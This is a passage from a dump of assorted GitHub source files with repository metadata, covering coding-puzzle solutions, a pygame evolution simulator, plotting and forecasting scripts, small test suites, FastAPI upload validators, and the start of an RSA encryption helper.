\"__main__\":\r\n main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc036/A/4902666.py","file_name":"4902666.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"71891980392","text":"from collections import deque\r\nimport sys\r\nN = int(sys.stdin.readline())\r\n# N = int(input())\r\n\r\n# 1번 카드가 제일 위에(마지막 인덱스) 위치\r\nlst = list(range(1, N+1))\r\nlst = deque(lst)\r\n# 두개의 카드가 남을 때까지 반복 \r\nwhile len(lst) > 2: \r\n # 가장 위에 있는 카드 바닥에 버리기 \r\n lst.popleft()\r\n # 그다음 위에 있는 카드를 제일 아래에 있는 카드로 옮기기 \r\n lst.append(lst.popleft())\r\n\r\nprint(lst[-1])","repo_name":"data-sign/algorithm","sub_path":"백준/Unrated/2164. 카드2/카드2.py","file_name":"카드2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35437618144","text":"import sys, random\nimport pygame\nfrom pygame.locals import *\nimport pymunk\nimport pymunk.pygame_util\n\nfrom Obstacle import Obstacle\nfrom Creature import Creature\n\n# handles game functionality, including colision and evolution management\nclass Overlord:\n\tdef __init__(self, screen, space, draw_options, display_x, display_y, epsilon, population_size=10, simulation_step=0.1, epochs=1000):\n\n\t\t# screen we are drawing on\n\t\tself.screen = screen\n\n\t\t# simulation space\n\t\tself.space = space\n\n\t\t# used for easy drawing of all simulation objects\n\t\tself.draw_options = draw_options\n\n\t\t# width and height of the screen for the fitness test and side bar\n\t\tself.fitness_display_x, self.fitness_display_y = 0.9*display_x, display_y\n\t\tself.sidebar_display_x, self.sidebar_display_y = 0.1*display_x, display_y\n\t\tself.sidebar_display_start_x = self.fitness_display_x\n\n\t\t#the zone in which creatures can be instantiated\n\t\tself.creation_bounds = self.make_creation_bounds() \n\n\t\t# all living creatures\n\t\tself.population_size = population_size\n\n\t\t# the number of steps in the simulation we advance after each iteration\n\t\tself.simulation_step = simulation_step\n\n\t\t# populate creatures\n\t\tself.creatures = []\n\t\tfor i in range(self.population_size):\n\t\t\tc = Creature(self.creation_bounds)\n\t\t\tself.creatures.append(c)\n\n\t\t# sidebar creatures\n\t\tself.sidebar_creatures = self.populate_sidebar()\n\n\t\t# mutation rate for creatures\n\t\tself.epsilon = epsilon\n\n\t\t# all static obstacles\n\t\tself.obstacles = self.obstacle_set_1()\n\n\t\t# variables used for each generation, this includes fitness scores and current creatures indices\n\t\tself.epoch = 0\n\t\tself.current_creature_ind = 0\n\t\tself.fitness_scores = [None for x in range(self.population_size)]\n\n\t# builds the zone in which creatures can be instantiated\n\tdef make_creation_bounds(self):\n\t\treturn [0.05*self.fitness_display_x, 0.95*self.fitness_display_x, 0.9*self.fitness_display_y, self.fitness_display_y]\n\n\t# displays all the creatures in the population as static objects in the sidebar\n\tdef populate_sidebar(self, refresh=False):\n\n\t\tif refresh:\n\t\t\tself.clear_sidebar()\n\n\t\t# calculate the starting x position and the separation between each sidebar object on the y axis\n\t\tcreature_separation = (0.9*self.sidebar_display_y) / max(1,len(self.creatures))\n\t\tx = self.sidebar_display_start_x + self.sidebar_display_x / 2\n\n\t\t# list of objects in the sidebar\n\t\tsidebar_creatures = []\n\n\t\t# make each creature as a static object in the sidebar\n\t\tcount = 1\n\t\tfor c in self.creatures:\n\t\t\tob = Obstacle(c.vertices, (x,self.sidebar_display_y - creature_separation*count), self.space)\n\t\t\tsidebar_creatures.append(ob)\n\t\t\tcount += 1\n\n\t\treturn sidebar_creatures\n\n\t# removes all objects in the sidebar\n\tdef clear_sidebar(self):\n\t\tfor ob in self.sidebar_creatures:\n\t\t\tself.space.remove(ob.shape,ob.shape.body)\n\n\t# test a creature in the population\n\t#TODO: update the population\n\tdef test_creatures(self):\n\n\t\tcurrent_creature = self.creatures[self.current_creature_ind]\n\n\t\tif current_creature.shape == None:\n\t\t\tcurrent_creature.build_creature(self.space)\n\n\t\tif not current_creature.in_space:\n\t\t\tcurrent_creature.add_to_space(self.space)\n\n\t\t# update the creature's lowest y-value and time of making it there.\n\t\t# if the creature is greater than or equal to the specified species age,\n\t\t# this constitutes a completed life_cycle, which will be a value of either\n\t\t# 1 or 0. When a life cycle is completed, the creature dies and score is recorded\n\t\tlife_cycle = current_creature.update(self.simulation_step)\n\n\t\t# if life cycle is complete (== 1), record best scores for the creature and select the next creature\n\t\tif life_cycle == 1:\n\t\t\tself.fitness_scores[self.current_creature_ind] = (current_creature.lowest_y, current_creature.time_of_low_point)\n\t\t\tself.remove_creature_from_space(current_creature)\n\t\t\tself.current_creature_ind += 1\n\n\t\t\tif self.current_creature_ind >= self.population_size:\n\t\t\t\tself.update_population()\n\t\t\t\tself.epoch += 1\n\n\t\t\t\n\n\n\tdef update_population(self):\n\n\t\tzip_list = zip(self.fitness_scores,self.creatures)\n\n\t\t# calculate 2 best and 1 worst member of the population\n\t\tsorted_scores = []\n\t\tfor i in range(self.population_size):\n\t\t\tfitness_rating = self.calculate_fitness_rating(self.fitness_scores[i])\n\t\t\tsorted_scores.append((fitness_rating,self.creatures[i]))\n\n\t\t# sort scores by fitness rating in descending order\n\t\tsorted_scores.sort(key=lambda t:t[0],reverse=True)\n\n\t\t# delete worst 2 members\n\t\tsorted_scores.pop()\n\t\tsorted_scores.pop()\n\n\t\t# breed 2 best and add child to population\n\t\tp1 = sorted_scores[0][1]\n\t\tp2 = sorted_scores[1][1]\n\t\tnew_creature = Creature(self.creation_bounds,[p1,p2],self.epsilon)\n\t\tself.creatures = [new_creature]\n\t\t\n\t\tfor v in sorted_scores:\n\t\t\tself.creatures.append(v[1])\n\n\t\t# add a completely random member to the population\n\t\tself.creatures.append(Creature(self.creation_bounds))\n\n\t\t# repopulate sidebar with new population\n\t\tself.sidebar_creatures = self.populate_sidebar(refresh=True)\n\n\t\t#reset all creature metadta\n\t\tfor c in self.creatures:\n\t\t\tc.reset()\n\n\t\t#reset current creature index for next iteration\n\t\tself.current_creature_ind = 0\n\n\t# given a tuple of a creature's fitness scores, calculate an arbitrary rating value of the performance\n\tdef calculate_fitness_rating(self,tup):\n\t\treturn 1 / tup[0]\n\t\n\tdef print_population_scores(self):\n\t\tprint(\"########## Epoch: {} ##########\".format(self.epoch))\n\t\tfor i in range(self.population_size):\n\t\t\tprint(\"Creature: {}\".format(i))\n\t\t\tprint(\"\\t Lowest point: {}\".format(self.fitness_scores[i][0]))\n\t\t\tprint(\"\\t Time: {}\\n\".format(self.fitness_scores[i][1]))\n\n\n\t# remove the specified creature from the game space.\n\tdef remove_creature_from_space(self, creature):\n\t\tself.space.remove(creature.shape,creature.shape.body)\n\t\tcreature.in_space = 0\n\n\n\tdef update(self):\n\t\t# wipe the screen\n\t\tself.screen.fill((255,255,255))\n\n\t\t# test a creature. Once a creature has completed testing, the next creature will be tested.\n\t\t# after all creatures have been tested, the epoch ends, the population is updated, and we repeat\n\t\tself.test_creatures()\n\t\t\n\t\t# draw all objects attatched to the space\n\t\tself.space.debug_draw(self.draw_options)\n\n\t\t# increment the simulation by one step\n\t\tfor i in range(1000):\n\t\t\tself.space.step(self.simulation_step/10.0)\n\n\t\t# set the display to the current buffered display\n\t\tpygame.display.flip()\n\n\tdef obstacle_set_1(self):\n\n\t\tlw_p = (0,0)\n\t\tlw_v = [(0, 0), (0.01*self.fitness_display_x,0), (0.01*self.fitness_display_x, self.fitness_display_y), (0, self.fitness_display_y)]\n\t\tlw = Obstacle(lw_v, lw_p, space=self.space)\n\n\t\trw_p = (0.99*self.fitness_display_x,0)\n\t\trw_v = [(0, 0), (0.01*self.fitness_display_x,0), (0.01*self.fitness_display_x, self.fitness_display_y), (0, self.fitness_display_y)]\n\t\trw = Obstacle(rw_v, rw_p, space=self.space)\n\n\t\tbot_p = (0,0)\n\t\tbot_v = [(0,0),(self.fitness_display_x, 0), (self.fitness_display_x,0.01*self.fitness_display_y), (0, 0.01*self.fitness_display_y)]\n\t\tbot = Obstacle(bot_v, bot_p, space = self.space)\n\n\t\tp1 = (0.5*self.fitness_display_x,0)\n\t\tv1 = [(0,0.8*self.fitness_display_y),(0,0.7*self.fitness_display_y), (0.5*self.fitness_display_x,0.7*self.fitness_display_y)]\n\t\tob1 = Obstacle(v1,p1,space=self.space)\n\n\t\tp2 = (0.5*self.fitness_display_x,0)\n\t\tv2 = [(0,0.8*self.fitness_display_y),(0,0.7*self.fitness_display_y), (-0.3*self.fitness_display_x,0.7*self.fitness_display_y)]\n\t\tob2 = Obstacle(v2,p2,space=self.space)\n\n\t\tp3 = (0,0)\n\t\tv3 = [(0,0.7*self.fitness_display_y),(0,0.55*self.fitness_display_y), (0.8*self.fitness_display_x,0.565*self.fitness_display_y), (0.8*self.fitness_display_x,0.57*self.fitness_display_y)]\n\t\tob3 = Obstacle(v3,p3,space=self.space)\n\n\t\tp4 = (0.5*self.fitness_display_x,0)\n\t\tv4 = [(0.5*self.fitness_display_x,0.54*self.fitness_display_y),(0.5*self.fitness_display_x,0.45*self.fitness_display_y), (-0.4*self.fitness_display_x,0.40*self.fitness_display_y)]\n\t\tob4 = Obstacle(v4,p4,space=self.space)\n\n\t\treturn [lw, rw, bot, ob1, ob2, ob3, ob4]\n","repo_name":"Richard-Hansen/EvolutionaryShapes","sub_path":"Overlord.py","file_name":"Overlord.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14832097007","text":"# Roll Die Dynamic\n\"\"\"Dynamically graphing frequencies of die rolls\"\"\"\n\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\nimport random\nimport seaborn as sns\nimport sys\n\n\ndef update(frame_number, rolls, faces, frequencies):\n \"\"\"Configures bar plot contents foeach animation frame.\"\"\"\n # roll die and update frequencies\n for _ in range(rolls):\n frequencies[random.randrange(1, 7) - 1] += 1\n \n # reconfigure plot for updated die frequencies\n plt.cla() # clear old contents of current Figure\n axes = sns.barplot(faces, frequencies, palette='bright') # new bars\n axes.set_title(f'Die Frequencies for {sum(frequencies):,} Rolls')\n axes.set(xlabel='Die Value', ylabel='Frequency')\n axes.set_ylim(top=max(frequencies) * 1.10) # scale y-axis by 10%\n\n # display frequency & percentage above each patch (bar)\n for bar, frequency in zip(axes.patches, frequencies):\n text_x = bar.get_x() + bar.get_width() / 2.0\n text_y = bar.get_height()\n text = f'{frequency:,}\\n{frequency / sum(frequencies):.3%}'\n axes.text(text_x, text_y, text, ha='center', va='bottom')\n\n# read command-line arguments for number of frames and rolls per frame\nnumber_of_frames = int(sys.argv[1])\nrolls_per_frame = int(sys.argv[2])\n\nsns.set_style('whitegrid') # white background with gray grid lines\nfigure = plt.figure('Rolling Six-Sided Die') # figure for animation\nvalues = list(range(1, 7)) # die favces for display on x-axis\nfrequencies = [0] * 6 # six - element list of die frequencies\n\n# configure and start animation that calls function update\ndie_animation = animation.FuncAnimation(figure, update, repeat=False, frames=number_of_frames, interval=33,\n fargs=(rolls_per_frame, values, frequencies))\n\nplt.show() # display window","repo_name":"cpoles/data_science","sub_path":"machine_learning/deitel/dicts_sets/roll_die_dynamic.py","file_name":"roll_die_dynamic.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"33941727797","text":"#foarte asemanatoare cu number of islands \n# doar ca in loc sa incrementam un contor in momentul in care gasim o insula, \n# numaram fiecare parcela din insula respectiva si vedem care e cea mai mare\n\ndef dfs(grid, i, j):\n if i<0 or j<0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j]!=1: return 0\n grid[i][j] = 0\n return 1+dfs(grid,i+1,j)+dfs(grid,i,j+1)+dfs(grid,i-1,j)+dfs(grid,i,j-1)\n\nclass Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n\n if not grid: return 0\n max = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n k = dfs(grid,i,j)\n if k > max: max = k\n return max","repo_name":"piratzii-tm/algorithms_solutions","sub_path":"leetcode/Max_area_of_island.py","file_name":"Max_area_of_island.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"139082889","text":"import pytest\nimport requests\nfrom hamcrest import assert_that, calling, raises, contains_string\nfrom hamcrest.core.base_matcher import BaseMatcher\nfrom library.python.testing.pyremock.lib.pyremock import MatchRequest, MockResponse, assert_expectations\nfrom base_test import BaseTest\n\n\nclass TestAssertExpectations(BaseTest):\n class _RaisingMatcher(BaseMatcher):\n def _matches(self, item):\n raise Exception(\"Match failed\")\n\n def describe_to(self, description):\n return \"\"\n\n def test_exception_in_route_matcher(self):\n request = MatchRequest(method=self._RaisingMatcher())\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.not_found\n assert_that(calling(self.mock_server.assert_expectations), raises(AssertionError))\n\n def test_exception_in_request_matcher(self):\n request = MatchRequest(body=self._RaisingMatcher())\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.bad_request\n assert_that(calling(self.mock_server.assert_expectations), raises(AssertionError))\n\n @assert_expectations\n def _test_assert_expectations_decorator_with_failed_expectations(self):\n request = MatchRequest()\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n def test_assert_expectations_decorator_with_failed_expectations(self):\n assert_that(calling(self._test_assert_expectations_decorator_with_failed_expectations),\n raises(AssertionError))\n\n @assert_expectations\n def test_assert_expectations_decorator_with_successed_expectations(self):\n request = MatchRequest()\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.ok\n\n @pytest.mark.parametrize(\"arg\", [0, 1])\n @assert_expectations\n def test_assert_expectations_decorator_with_parametrization(self, arg):\n request = MatchRequest(path=contains_string(str(arg)))\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"/%d\" % arg)\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.ok\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"library/testing/pyremock/tests/test_assert_expectations.py","file_name":"test_assert_expectations.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40399099786","text":"# -*- coding: utf-8 -*-\n\nimport enum\nfrom typing import Optional, Dict\n\nfrom matplotlib import pyplot as plt\nfrom mpl_events.mpl import Figure\n\nfrom .base import InteractorBase\nfrom .zoom import MouseWheelScrollZoomInteractor\nfrom .drag import MouseDragInteractor\nfrom .state import AxesLimitsResetInteractor\n\n\nclass Actions(enum.Flag):\n \"\"\"Interaction action flags\n \"\"\"\n\n ZOOM = enum.auto()\n DRAG = enum.auto()\n RESET = enum.auto()\n\n ALL = ZOOM | DRAG | RESET\n\n\ndef interact(figure: Optional[Figure] = None,\n actions: Actions = Actions.ALL) -> Dict[Actions, InteractorBase]:\n \"\"\"Enables interactors for the figure\n\n Supports interaction actions:\n\n * zoom\n * drag\n * reset axes\n \"\"\"\n if not figure:\n figure = plt.gcf()\n\n if not hasattr(interact, 'interactors'):\n interact.interactors = {}\n\n if figure in interact.interactors:\n for interactor in interact.interactors[figure].values():\n interactor.mpl_disconnect()\n del interact.interactors[figure]\n\n interactors = interact.interactors.setdefault(figure, {})\n\n if Actions.ZOOM in actions:\n interactors[Actions.ZOOM] = MouseWheelScrollZoomInteractor(figure)\n if Actions.DRAG in actions:\n interactors[Actions.DRAG] = MouseDragInteractor(figure)\n if Actions.RESET in actions:\n interactors[Actions.RESET] = AxesLimitsResetInteractor(figure)\n\n return interactors\n","repo_name":"espdev/mpl-interact","sub_path":"mpl_interact/shortcuts.py","file_name":"shortcuts.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38936847979","text":"'''\nCreated on 30-Sep-2016\n\n@author: harshit\n'''\n\nimport pandas as pd\n\ntrain_data = pd.read_csv('../data/CAX_Train.csv', dtype={'mpn_qs': object})\n\ntrain_data_title = train_data['title'].astype(str)\ntrain_data_desc = train_data['product_description'].astype(str)\ntrain_data_mpn = train_data['mpn_qs'].astype(str)\n\nnumRows = len(train_data)\n\nf = open('../aux_data/train_mismatch_rows_naive.txt','w')\n\nmisMatchCount = 0\n\nfor i in range(numRows):\n title_split = train_data_title[i].split()\n desc_split = train_data_desc[i].split()\n \n found = False\n \n for tc in title_split:\n if train_data_mpn[i] == tc:\n found = True\n break\n \n if found == False: \n for dc in desc_split:\n if train_data_mpn[i] == dc:\n found = True\n break\n \n if found == False:\n misMatchCount += 1\n f.write( \"\\nrow with id \" + str(i+ 1) + \" couldn't find overlap\")\n\nf.write(\"\\nTotal mismatched: \" + str(misMatchCount) + \" out of \" + str(numRows))\n \n","repo_name":"pandeconscious/crowdanalyticsProductMPN","sub_path":"src/naiveMPNContainmentCheck.py","file_name":"naiveMPNContainmentCheck.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20875475125","text":"# https://adventofcode.com/2022/day/9\n# AoC 2022 - 9_1\n\nimport numpy as np\n\ndef get_input_data(in_file: str):\n with open(in_file, 'r') as f_in:\n return [_line.strip() for _line in f_in.readlines()]\n \n\ndef update_tail(tail_idx: int, head_idx: int):\n # row: head moves right, col: head moves down\n if tail_idx < head_idx:\n return 1\n # row: head moves left, col: head moves up\n if tail_idx > head_idx:\n return -1\n return 0\n\ndef get_save_matrix_size(_lines: list):\n max_rows, max_cols = 1, 1\n sum_up, sum_right = 0, 0\n for line in _lines: \n direction, steps = line.split()\n steps = int(steps)\n if direction == 'U' or direction == 'D': \n max_rows += steps\n sum_up += steps if direction == 'U' else 0\n if direction == 'R' or direction == 'L':\n max_cols += steps\n sum_right += steps if direction == 'R' else 0\n _grid = np.zeros((max_rows, max_cols))\n _start = {'row': sum_up, 'col': sum_right} \n return _grid, {'row': sum_up, 'col': sum_right}, {'row': sum_up, 'col': sum_right}\n\n\n\ninput_data = \"aoc2022_data/aoc2022_9.txt\"\nlines = get_input_data(input_data)\n\n\n# get maximum matrix size: sum all up and down for vertical (= rows) and \n# all right and left values for horizontal (= cols) direction\n# one additional row and col for start position\n\ngrid, t_pos, h_pos = get_save_matrix_size(lines)\ngrid[h_pos['row'], h_pos['col']] = 1\n\nfor line in lines:\n direction, steps = line.split()\n steps = int(steps)\n for step in range(steps):\n \n # move head \n if direction == 'U':\n h_pos['row'] -= 1\n if direction == 'D':\n h_pos['row'] += 1\n if direction == 'L':\n h_pos['col'] -= 1\n if direction == 'R':\n h_pos['col'] += 1\n \n # update tail \n # critical diagnoal distance \n if abs(t_pos['row'] - h_pos['row']) + abs(t_pos['col'] - h_pos['col']) > 2: \n t_pos['row'] += update_tail(t_pos['row'], h_pos['row'])\n t_pos['col'] += update_tail(t_pos['col'], h_pos['col'])\n # critical horizontal distance \n elif abs(t_pos['row'] - h_pos['row']) > 1 and abs(t_pos['col'] - h_pos['col']) <= 1:\n t_pos['row'] += update_tail(t_pos['row'], h_pos['row'])\n # critical vertical distance\n elif abs(t_pos['row'] - h_pos['row']) <= 1 and abs(t_pos['col'] - h_pos['col']) > 1: \n t_pos['col'] += update_tail(t_pos['col'], h_pos['col'])\n \n # mark as visited\n grid[t_pos['row'], t_pos['col']] = 1\n\nt_visited = int(grid.sum())\nprint(f\"{t_visited} positions are visited by the tail of the rope at least once.\") \n","repo_name":"AntonieV/AoC2022","sub_path":"aoc_2022_day_9-1.py","file_name":"aoc_2022_day_9-1.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"162937809","text":"import pytest\n\n\n@pytest.mark.smtp\nasync def test_auth_invalid_method(env):\n client = await env.nwsmtp.get_client()\n await client._ehlo_or_helo_if_needed()\n\n auth_cmd = b\"AUTH WEIRDMETHOD\"\n code, msg = await client.execute_command(auth_cmd)\n\n assert code == 535\n assert \"5.7.8 Error: Method is not supported.\" in msg\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/infra/test_auth_invalid_method_smtp.py","file_name":"test_auth_invalid_method_smtp.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11751051708","text":"from typing import Type\nfrom fastapi import UploadFile\nimport magic\nfrom .config import MAX_IMAGE_UPLOAD_SIZE, ALLOWED_MEDIA_TYPES\nfrom .exceptions import BaseAPIException, RequestEntityTooLargeException, \\\n EmptyFileUploadException, UnsupportedMediaTypeException\n\n\ndef get_exception_responses(*exceptions: Type[BaseAPIException]) -> dict:\n responses = dict()\n for exception in exceptions:\n responses.update(exception.response_model())\n return responses\n\n\ndef validate_file_size(file: UploadFile):\n if file.size > MAX_IMAGE_UPLOAD_SIZE:\n raise RequestEntityTooLargeException\n\n\ndef validate_emptiness(files: list[UploadFile]):\n if not len(files):\n raise EmptyFileUploadException\n\n\ndef validate_file_format(file: UploadFile):\n file_type = magic.from_buffer(file.file.read(2048), mime=True)\n if file_type not in ALLOWED_MEDIA_TYPES:\n raise UnsupportedMediaTypeException\n","repo_name":"mrqwer/ml_fastapi_proj","sub_path":"src/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17583872765","text":"import pandas as pd\nfrom statsmodels.tsa.arima_model import ARIMA\nimport numpy as np\nimport csv\n\n\ndef get_distance(predict, expect):\n dist = (predict - expect) ** 2\n return np.sqrt(sum(dist))\n\n\ndef calc_error(pred_list, tar_list):\n diff = [abs(x1 - x2) for (x1, x2) in zip(tar_list, pred_list)]\n val = np.array(np.divide(diff, tar_list, out=np.zeros_like(diff), where=tar_list != 0))\n return 1 - val.mean(0)\n\n\ndef get_train_test_sets(num_history):\n data_set = pd.read_csv('../data/mergedData.csv', index_col=None, header=0)\n data_set['Date'] = pd.to_datetime(data_set.Date, format='%d/%m/%Y')\n cows = data_set.groupby(\"CowID\")\n train = []\n test = []\n\n for cow in cows.groups:\n cow_array = cows.get_group(cow)\n cow_array = cow_array.sort_values(by=['Date'])\n cow_array = cow_array.fillna(cow_array.mean())\n if cow_array.shape[0] < num_history:\n continue\n\n train.append(cow_array.tail(num_history).head(num_history - 1))\n test.append(cow_array.tail(num_history).tail(1))\n\n return train, test, data_set.columns[-15:]\n\n\ndef write_to_file(num_history, mean_error):\n file_name = '../results/arima/' + str(num_history - 1) + '_arima.csv'\n with open(file_name, 'w', newline='') as csv_file:\n res_writer = csv.writer(csv_file)\n for out, error in mean_error:\n res_writer.writerow([str(out), str(error)])\n\n\ndef run_arima(num_history):\n train, test, outputs = get_train_test_sets(num_history)\n mean_error = []\n\n for out in outputs:\n prediction = []\n test_out = []\n j = 0\n for tr in range(len(train)): # len(train)\n try:\n train_out = train[tr][out]\n model = ARIMA(train_out, order=(5, 1, 0))\n model_fit = model.fit(disp=0)\n predict = model_fit.forecast()\n prediction.append(predict[0].min())\n test_out.append(test[tr][out].values)\n\n except:\n j += 1\n continue\n\n error = calc_error(prediction, test_out)\n\n mean_error.append((out, error))\n print(str(out) + \": \", error)\n\n write_to_file(num_history, mean_error)\n\n\nif __name__ == \"__main__\":\n for i in range(10, 31):\n run_arima(i)\n","repo_name":"mirashama/Afimilk---Cow-s-Yield-Prediction","sub_path":"models/Arima.py","file_name":"Arima.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74391013674","text":"class node:\n def __init__(self, coeff, pwr):\n self.coeff = coeff\n self.next = None\n self.power = pwr\n\n\n# Linked List Class\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert(self, coeff, pwr):\n if self.head is None:\n self.head = node(coeff, pwr)\n else:\n new_node = node(coeff, pwr)\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = new_node\n\n\ndef create_list(arr, n):\n lis = LinkedList()\n k = 0\n for i in range(n):\n lis.insert(arr[k], arr[k + 1])\n k += 2\n return lis.head\n\n\ndef add_polynomial(poly1, poly2):\n string = ''\n arr = [0] * 1000\n while poly1 is not None:\n arr[poly1.power - 1] += poly1.coef\n poly1 = poly1.next\n while poly2 is not None:\n arr[poly2.power - 1] += poly2.coef\n poly2 = poly2.next\n for i in range(len(arr) - 1, -1, -1):\n if arr[i] != 0:\n string += \"{0}x^{1} + \".format(arr[i], i + 1)\n print(string.strip()[:-2])\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(t):\n n = int(input())\n arr = list(map(int, input().strip().split()))\n poly1 = create_list(arr, n)\n n = int(input())\n arr = list(map(int, input().strip().split()))\n poly2 = create_list(arr, n)\n add_polynomial(poly1, poly2)","repo_name":"Binovizer/GeeksForGeeks-Python","sub_path":"arrays/add_polynomial.py","file_name":"add_polynomial.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14506423998","text":"from pathlib import Path\nfrom typing import Optional\n\nimport click\nfrom pydantic import BaseSettings, validator\n\n\nALLOWED_FORMAT_VARIABLES = (\n \"media_type\",\n \"media_format\",\n \"file\",\n \"file_extension\",\n \"file_name\",\n \"relative_path\",\n)\n\n\nclass GlobalSettings(BaseSettings):\n format_pattern: Optional[str] = None\n unknown_format_pattern: Optional[str] = None\n storage_location: Path = Path.home().joinpath(\".catalogues/\")\n\n class Config:\n env_prefix = \"CATALOGUER_\"\n\n @validator(\"format_pattern\", \"unknown_format_pattern\", allow_reuse=True)\n def validate_format_pattern(cls, format_pattern: str):\n if format_pattern:\n try:\n format_pattern.format(\n **{field: \"\" for field in ALLOWED_FORMAT_VARIABLES}\n )\n except KeyError as exception:\n raise click.BadParameter(\n f'Unrecognised \"{exception.args[0]}\" format variable. Please check your format pattern.'\n )\n return format_pattern\n\n @validator(\"storage_location\")\n def storage_location_must_exists(cls, storage_location: Path):\n if storage_location:\n storage_location = storage_location.resolve()\n if storage_location.exists() and not storage_location.is_dir():\n raise ValueError(f\"{storage_location} is not a directory\")\n storage_location.mkdir(parents=True, exist_ok=True)\n return storage_location\n","repo_name":"iago1460/cataloguer","sub_path":"cataloguer/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"8872028095","text":"# 1. 딕셔너리 생성\r\ncities = {\r\n 'Korea' : 'Seoul',\r\n 'Japan' : 'Tokyo',\r\n 'China' : 'Beijing',\r\n 'USA' : 'Washington',\r\n 'France' : 'PARIS'\r\n}\r\n# 2. 딕셔너리의 데이터 접근\r\n\r\nprint(cities)\r\nprint(cities['Korea'])\r\nprint(cities.get('Japan'))\r\ncities['France'] = 'Paris'\r\nprint(cities['France'])\r\ncities['Germany'] = 'Berlin'\r\nprint(cities)\r\nfor country in cities:\r\n print(country)\r\n\r\n#6 반복문으로 딕셔너리의 값 탐색\r\nfor country in cities.values():\r\n print(country)\r\n\r\n#7 반복문으로 딕셔너리의 키 그리고 값 둘다 탐색\r\nfor country, city in cities.item():\r\n print('country: {}, city: {}'.format(country, city))","repo_name":"slihump/study","sub_path":"python/dictionaries_ex.py","file_name":"dictionaries_ex.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73074244392","text":"# -*- coding: utf-8 -*-\n# 依赖包 pip install pycryptodome\n# 如果仍然报没有Module可以尝试将 python安装目录下site-packages的子文件夹crypto改成Crypto\n\nimport Crypto.Cipher as Cipher\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_v1_5 as PKCS1_v1_5_cipper\nfrom Crypto.Signature import PKCS1_v1_5 as PKCS1_v1_5_sign\nfrom Crypto.Hash import SHA1\nimport base64\n\nclass RsaHelper(object):\n \"\"\"RSA加解密签名类\n \"\"\"\n\n def __init__(self, ciper_lib=PKCS1_v1_5_cipper, sign_lib=PKCS1_v1_5_sign, hash_lib=SHA1,\n pub_file=None, pri_file=None, pub_skey=None, pri_skey=None, pub_key=None, pri_key=None,\n reversed_size=11):\n\n # 加解密库\n self.ciper_lib = ciper_lib\n self.sign_lib = sign_lib\n self.hash_lib = hash_lib\n\n # 公钥密钥\n if pub_key:\n self.pub_key = pub_key\n elif pub_skey:\n self.pub_key = RSA.importKey(pub_skey)\n elif pub_file:\n self.pub_key = RSA.importKey(open(pub_file).read())\n\n if pri_key:\n self.pri_key = pri_key\n elif pri_skey:\n self.pri_key = RSA.importKey(pri_skey)\n elif pri_file:\n self.pri_key = RSA.importKey(open(pri_file).read())\n\n # 分块保留长度\n self.block_reversed_size = reversed_size\n\n # 根据key长度计算分块大小\n def get_block_size(self, rsa_key):\n try:\n # RSA仅支持限定长度内的数据的加解密,需要分块\n # 分块大小\n reserve_size = 